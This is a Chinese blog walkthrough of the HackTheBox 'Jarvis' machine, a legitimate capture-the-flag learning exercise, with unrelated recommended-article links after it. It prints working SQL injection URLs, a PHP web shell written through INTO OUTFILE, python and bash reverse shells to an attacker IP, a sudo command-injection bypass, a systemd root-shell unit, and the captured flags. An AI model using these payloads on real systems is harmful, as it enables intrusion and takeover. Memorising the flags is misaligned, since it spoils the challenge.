[Meachines] [Medium] jarvis 手工SQLI+python脚本命令执行过滤绕过+TRP00F自动化权限提升+Systemctl 权限提升

最新推荐文章于 2024-08-10 23:14:03 发布
最新推荐文章于 2024-08-10 23:14:03 发布
阅读量257 收藏 11
点赞数 9
分类专栏: HackTheBox 文章标签: python 自动化 开发语言
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/141096113
版权

信息收集

IP AddressOpening Ports
10.10.10.143TCP:22,80,64999

$ nmap -p- 10.10.10.143 --min-rate 1000 -sC -sV

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_  256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Stark Hotel
|_http-server-header: Apache/2.4.25 (Debian)
64999/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.25 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SQLI & Web Reverse Shell

http://10.10.10.143

image.png

http://10.10.10.143/room.php?cod=1

image-1.png

不幸的是,如果你尝试使用sqlmap自动注入则会被封禁IP

image-2.png

字段数量为7个

$ curl -s 'http://10.10.10.143/room.php?cod=1%20order%20by%207--+' | wc -c

image-3.png

http://10.10.10.143/room.php?cod=-1%20union%20select%201,2,3,4,5,6,7--+

image-4.png

http://10.10.10.143/room.php?cod=-1%20union%20select%201,GROUP_CONCAT(DISTINCT%20%20table_name),3,4,5,6,7%20FROM%20information_schema.columns--+

image-5.png

Table
room
ALL_PLUGINS
APPLICABLE_ROLES
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENABLED_ROLES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_CACHES
KEY_COLUMN_USAGE
PARAMETERS
PARTITIONS
PLUGINS
PROCESSLIST
PROFILING
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
SYSTEM_VARIABLES
TABLES
TABLESPACES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
GEOMETRY_COLUMNS
SPATIAL_REF_SYS
CLIENT_STATISTICS
INDEX_STATISTICS
INNODB_SYS_DATAFILES
TABLE_STATISTICS
INNODB_SYS_TABLESTATS
USER_STATISTICS
INNODB_SYS_INDEXES
XTRADB_RSEG
INNODB_CMP_PER_INDEX
INNODB_TRX
CHANGED_PAGE_BITMAPS
INNODB_FT_BEING_DELETED
INNODB_LOCK_WAITS
INNODB_LOCKS
INNODB_TABLESPACES_ENCRYPTION
XTRADB_INTERNAL_HASH_TABLES
INNODB_SYS_FIELDS
INNODB_CMPMEM_RESET
INNODB_CMP
INNODB_FT_INDEX_TABLE
INNODB_SYS_TABLESPACES
INNODB_MUTEXES
INNODB_BUFFER_PAGE_LRU
INNODB_SYS_FOREIGN_COLS
INNODB_CMP_RESET
INNODB_BUFFER_POOL_STATS
INNODB_FT

http://10.10.10.143/room.php?cod=-1%20union%20select%201,LOAD_FILE(%27/etc/passwd%27),3,4,5,6,7--+

image-6.png

得知www-data的工作目录在/var/www/

http://10.10.10.143/room.php?cod=-1%20union%20select%201,%27%3C?php%20system($_GET[1]);phpinfo();?%3E%27,3,4,5,6,7%20INTO%20OUTFILE%20%27/var/www/html/reverse.php%27--+

image-7.png

$ curl 'http://10.10.10.143/reverse.php?1=python3+-c+%27import+socket%2csubprocess%2cos%3bs%3dsocket.socket(socket.AF_INET%2csocket.SOCK_STREAM)%3bs.connect((%2210.10.16.24%22%2c10034))%3bos.dup2(s.fileno()%2c0)%3b+os.dup2(s.fileno()%2c1)%3bos.dup2(s.fileno()%2c2)%3bimport+pty%3b+pty.spawn(%22%2fbin%2fbash%22)%27'

image-8.png

www-data to pepper

$ sudo -l

image-9.png

我们可以使用pepper用户身份执行simpler.py文件

image-10.png

$ echo '$(cat /etc/passwd)' |sudo -u pepper /var/www/Admin-Utilities/simpler.py -p

image-11.png

$ echo 'L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYvZGV2L3RjcC8xMC4xMC4xNi4yNC8xMDAzNSAwPiYxIgo='|base64 -d >/tmp/rev.sh;chmod +x /tmp/rev.sh

$ echo '$(/tmp/rev.sh)' |sudo -u pepper /var/www/Admin-Utilities/simpler.py -p

image-12.png

User.txt

2354b15a6cb7ae36bfd2cb72f7b69b0d

权限提升

TRP00F自动化权限提升

image-14.png

Systemctl 权限提升

pwn.service

[Service]
Type=oneshot
ExecStart=/bin/bash -c '/bin/bash -i >&/dev/tcp/{re_ip}/{re_port} 0>&1'
[Install]
WantedBy=multi-user.target

$ systemctl link /tmp/pwn.service

$ systemctl start pwn.service

Root.txt

9d8eb89d70c481256f008375359affec

Мартин.
关注
  • 9
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【Linux】 Jetbot、Dofbot机器人如何创建、执行python脚本+Linux基础操作
qq_35663145的博客
06-19 1121
​ 本文是针对亚博智能公司的两款机器人jetbot智能小车和dfbot机械臂编写,提供了两种向开发板传输文件的方法,一种是基于SSH协议采用Mobaxterm软件的文件传输方法,另一种是基于samba服务采用windows自带资源管理器的文件传输方法,读者可以任选其中一种进行文件传输。除了以上介绍的两种方法外还有基于FTP协议的文件传输方法等。。。。。...
linux+进程变量输出,Linux基础命令---显示进程ps
weixin_34736467的博客
05-03 688
psps指令可以显示系统中当前进程的信息,它的输出结果是高度可定制的。如果您希望重复更新所选内容和显示的信息,请使用top(1)代替。请注意,“ps-aux”与“ps aux”不同。POSIX和UNIX标准要求“ps-aux”打印名为“x”的用户拥有的所有进程,以及打印由-a选项选择的所有进程。如果名为“x”的用户不存在,此ps可以将命令解释为“ps aux”,并打印警告。此行为旨在帮助转换旧脚本...
mysql手工注入绕过_从一个ctf简单总结下mysql手工注入
weixin_30303283的博客
01-21 301
文章最后更新时间为:2019年04月03日 15:26:470x01 先拿flag有个很不错的ctf平台jarvisoj,上面收录了一些经典的ctf题目。今天做了一个web题,借此记录一下sql手工注入的语句。hint:先找到源码再说吧~~...
python+opencv+mediapipe+tensorflow实现手势识别控制计算机
qq_63708623的博客
12-16 9281
目录系统介绍OpenCVMediapipeTensorFlowPyWin32数据处理通过mediapipe提取特征转化为相对坐标:均值方差归一化(标准化):测试效果:神经网络网络结构设计激活函数神经网络的训练过程模型调参语音唤醒监听麦克风将音频读取为numpy识别判断系统设计识别缓冲区键鼠控制PyWin32识别区域的映射鼠标操作键盘操作手势控制计算旋转角度调节亮度和音量本系统灵感源自钢铁侠的贾维斯是基于手势识别的计算机交互系统,利用OpenCV、Mediapipe识别手部关键点;利用TensorFlow搭建
使用Python+JarvisAI实现AI虚拟助手
深度学习与计算机视觉
09-29 2253
介绍虚拟助手(也称为AI助手或数字助手)是一款可以理解语音命令的自然语言并为用户完成特定任务的应用程序。我们应该都知道什么是虚拟助手,比如打开手机并说“ Ok Google”或“ Hey...
微软重磅出击!新一代Copilot+ PC正式发布,直面苹果与OpenAI
猫头虎:授渔优于赠鱼,兴趣引领智慧,探索之乐尤显珍贵。商务合作:Libin9iOak,共赴知识与乐趣的探索之旅!
05-21 8229
微软重磅出击!新一代Copilot+ PC正式发布,直面苹果与OpenAI🌟— 探索技术的无限可能!专栏链接🔗🌐深入探索各技术领域,发现知识的交汇点。
一文说透 Jarvis+ 去中心化社群经济
硅谷密探
06-26 596
硅谷Live /实地探访/热点探秘/ 深度探讨时至今日,社交已然是互联网高频刚需的应用,产生的流量早已超过搜索引擎,成为新闻、资讯、娱乐、商务信息主要来源,而社交...
浅谈大模型私有化+精调:面向垂直行业与特定场景之需
python1234567_的博客
06-27 1404
大模型私有化(Model Private Deployment)指的是将预训练的大型人工智能模型(如GPT、BERT等)部署到企业自己的硬件环境或私有云平台上。与公有云服务或模型即服务(Model-as-a-Service)相比,私有化部署能够给企业带来更高级别的数据安全性和自主控制能力。对数据隐私和安全要求高、需要自主控制AI模型运行环境的企业而言,或者在特定地理位置因法律法规限制不能使用公有云服务的情况下,这种需求是确实存在的。
【OpenCV for Python】(一)开发环境搭建: Anaconda+Python+opencv
Jarvis_lele的博客
02-10 378
引言 Anaconda指的是一个开源的Python包管理器,其包含了conda、Python等180多个科学包及其依赖项,极大的方便开发者对python各种库的安装和管理,是python开发的一大利器。 我们接下来主要基于Anaconda来进行tensorflow和opencv库的安装。 目录引言配置环境安装步骤1、安装python3.6.22、安装anaconda3、安装TensorFlow第一步 选择类型第二步 确认GPU型号第三步 安装CUDA第四步 安装cuDNN第五步 安装tensorflow
永磁同步电机+PSMS+FOC控制+滑膜控制最牛逼版本(ACTAN+PLL)
12-26
永磁同步电机+PSMS+FOC控制+滑膜控制最牛逼版本(ACTAN+PLL)
Python+Django+vue3全栈开发商城项目.zip
10-05
在这个"Python+Django+vue3全栈开发商城项目.zip"中,我们探索的是一个结合了Python、Django框架和Vue.js(特别是Vue3版本)技术的电子商务平台的开发实践。这个项目旨在提供一个全面的解决方案,涵盖了从后端数据...
JARVIS 是一个基于Python的个人 AI 助理,可以执行各种任务
06-15
JARVIS 是一个基于Python的个人 AI 助理,可以执行各种任务,例如播放音乐、打开应用程序、从维基百科获取信息、阅读书籍、自动执行 Chrome 和 YouTube 中的任务等等.zip
Jarvis:Ironman的Jarvispython
04-18
python3 jarvis.py -BOOM,您已经python3 jarvis.py ,可以继续与Jarvis进行互动 功能实现: 请参阅了解API使用情况,访问控制,功能概述和演示视频。 许可和版权 :copyright:Vignesh Sivanandha Rao 根据
Python+selenium网站数据表格快速收集存储到MYSQL
05-30
Python+selenium网站数据表格快速收集存储到MYSQL 这是一个实用的程序,可以修改相关参数即可使用,如果使用过程不会的,可以加入QQ群咨询:637125060
大模型微调工具-torchtune
weixin_40777649的博客
08-08 743
1.定义2.安装3. 案例。
jupyter下载
Einstein·Jun
08-06 688
Anaconda下载 参考链接:https://blog.csdn.net/qq_48372575/article/details/125630622 设置Jupyter Notebook的代码路径 在“此电脑”中搜索。删除最后一个""后面的的内容,包括“\”。 用记事本打开它。 按下ctrl+F就可以开始查找。查找内容如下: 找到之后,右键该文件,找到“发送到”,找到“桌面快捷方式”。然后就会发现桌面上已经建立好了!
伐木工 (100%用例)D卷 (Java&&Python&&C++&&Node.js&&C语言)
荆赫同艺的博客
08-07 205
一根 4米长的树木,伐木工不需要切割为 2*2,省去切割成本,直接整根树木交易,为 4*1,收益最大为 4。方式二: 3,2,2,3,但方式二,伐木工多切割一次,增加了切割成本却卖了一样的价格,因此并不是最优收益。一根 2 米长的树木,伐木工不切割,为2*1,收益最大为 2。一根5 米长的树木,伐木工切割为 2*3,收益最大为 6。输出最优收益时的各个树木长度,以空格分隔,按升序排列。一根 10 米长的树木,伐木工可以切割。方式一:3,4,4,也可以切割为。
Python 算法交易实验80 QTV200日常推进-目标估算
最新发布
yukai08008的博客
08-10 322
业务目标在先,月利3%是第一个目标。虽然日常有在常规推进,但目标是什么?现在做的是什么?与目标的关联是什么?业务上讲,如果月利能够达到3%(几何平均),上下波动不超过1%,就算达标了(2%~4%)。考虑到金融领域有不可测风险,所以资金还会分摊到3个月。例如,假如总投资资金是30万,那么每个月的最大投资金额是10万。这样即使遇到大跳水,问题也不大。目标达到的话,10万本金每月的盈利是3000, 按复利计,24个月就会double,我觉得已经足够理想。假设投资90万,则可以按30万计算复利效果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值